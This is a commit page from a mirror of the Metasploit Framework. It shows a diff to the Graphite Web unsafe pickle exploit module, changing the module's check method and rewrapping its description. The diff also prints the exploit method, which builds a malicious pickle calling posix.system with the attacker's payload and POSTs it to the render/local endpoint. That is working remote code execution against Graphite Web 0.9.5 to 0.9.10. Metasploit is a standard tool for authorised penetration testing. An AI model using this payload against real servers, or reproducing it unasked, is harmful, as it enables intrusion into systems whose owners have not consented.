infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix check method

bug/bundler_fix
jvazquez-r7 2013-08-20 12:02:09 -05:00
parent 533d98bd1b
commit 42f774a064
1 changed files with 9 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/exploits/unix/webapp/graphite_pickle_exec.rb
View File

@ -16,9 +16,9 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Graphite Web Unsafe Pickle Handling',
'Description' => %q{
This module exploits a remote code execution vulnerability in the
pickle handling of the rendering code in the Graphite Web project between
version 0.9.5 and 0.9.10(both included).
This module exploits a remote code execution vulnerability in the pickle
handling of the rendering code in the Graphite Web project between version
0.9.5 and 0.9.10(both included).
},
'Author' =>
[
@ -60,19 +60,21 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'POST'
})
if response.code != 200
return Exploit::CheckCode::Appears
if response and response.code == 500
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
data = "line\ncposix\nsystem\np1\n(S'#{payload.encoded}'\np2\ntp3\nRp4\n."
print_status("Sending exploit payload...")
response = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'render', 'local'),
'method' => 'POST',
'data' => data
})
print_status("Sent exploit payload")
end
end